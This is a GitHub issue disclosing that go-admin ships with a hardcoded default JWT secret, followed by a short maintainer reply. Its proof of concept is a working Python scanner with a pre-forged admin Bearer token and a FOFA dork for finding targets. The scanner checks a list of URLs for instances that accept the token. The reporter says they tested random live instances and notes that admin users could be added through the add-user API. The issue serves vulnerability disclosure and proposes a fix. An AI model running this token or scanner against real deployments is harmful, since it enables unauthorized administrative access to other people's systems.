
[Vulnerability] go-admin JWT HardCoded #716

Closed
runningdown opened this issue Oct 12, 2022 · 1 comment

@runningdown
Description:

Although the configuration file prompts that the token secret needs to be modified, most users will still copy it directly if the change is not forced. The JWT secret is still 'go admin', including in production environments.

You can use a common JWT to access the API.

POC:

```python
# fofadork: icon_hash="-1533452521"
import requests

# Disable any environment proxies so requests go straight to the target.
proxy = {'http': None, 'https': None}

# Token signed with the default go-admin secret; claims identity=1 / rolekey=admin.
HEADER = {'Authorization': 'Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkYXRhc2NvcGUiOiIiLCJleHAiOjQ4MTg5MTg2MzAsImlkZW50aXR5IjoxLCJuaWNlIjoiYWRtaW4iLCJvcmlnX2lhdCI6MTY2NTI4MjYzMCwicm9sZWlkIjoxLCJyb2xla2V5IjoiYWRtaW4iLCJyb2xlbmFtZSI6Iuezu-e7n-euoeeQhuWRmCJ9.D08ymyYAo6giFJd8XEhqo6yjIaIZzfg0mi4j28rwwoc'}


def req(url):
    # /api/v1/getinfo returns the current user's profile; a valid "requestId"
    # in the body means the forged token was accepted as an authenticated session.
    uri = "/api/v1/getinfo"
    s = requests.session()
    res = s.get(url + uri, headers=HEADER, proxies=proxy, timeout=5)
    if "requestId" in res.text:
        print(url)
        print(res.text)


# url.txt: one base URL (scheme + host[:port]) per line.
with open('url.txt') as f:
    file = f.readlines()

for i in file:
    x = i.strip()
    if not x:
        continue
    try:
        req(x)
    except requests.RequestException:
        # Unreachable host, TLS error, timeout: skip and keep scanning.
        pass
```

I randomly tested multiple go-admin instances. It turns out that most URLs allow bypassing authentication and accessing the API directly with the tampered JWT. The figure shows the getinfo interface (if you want to attack, you can directly add users with administrator privileges via the add-user interface).

Fix:

Force random uuids for jwt keys

@wenjianzhang (Member)

Users usually do change the JWT secret, and there is a clear prompt about it.
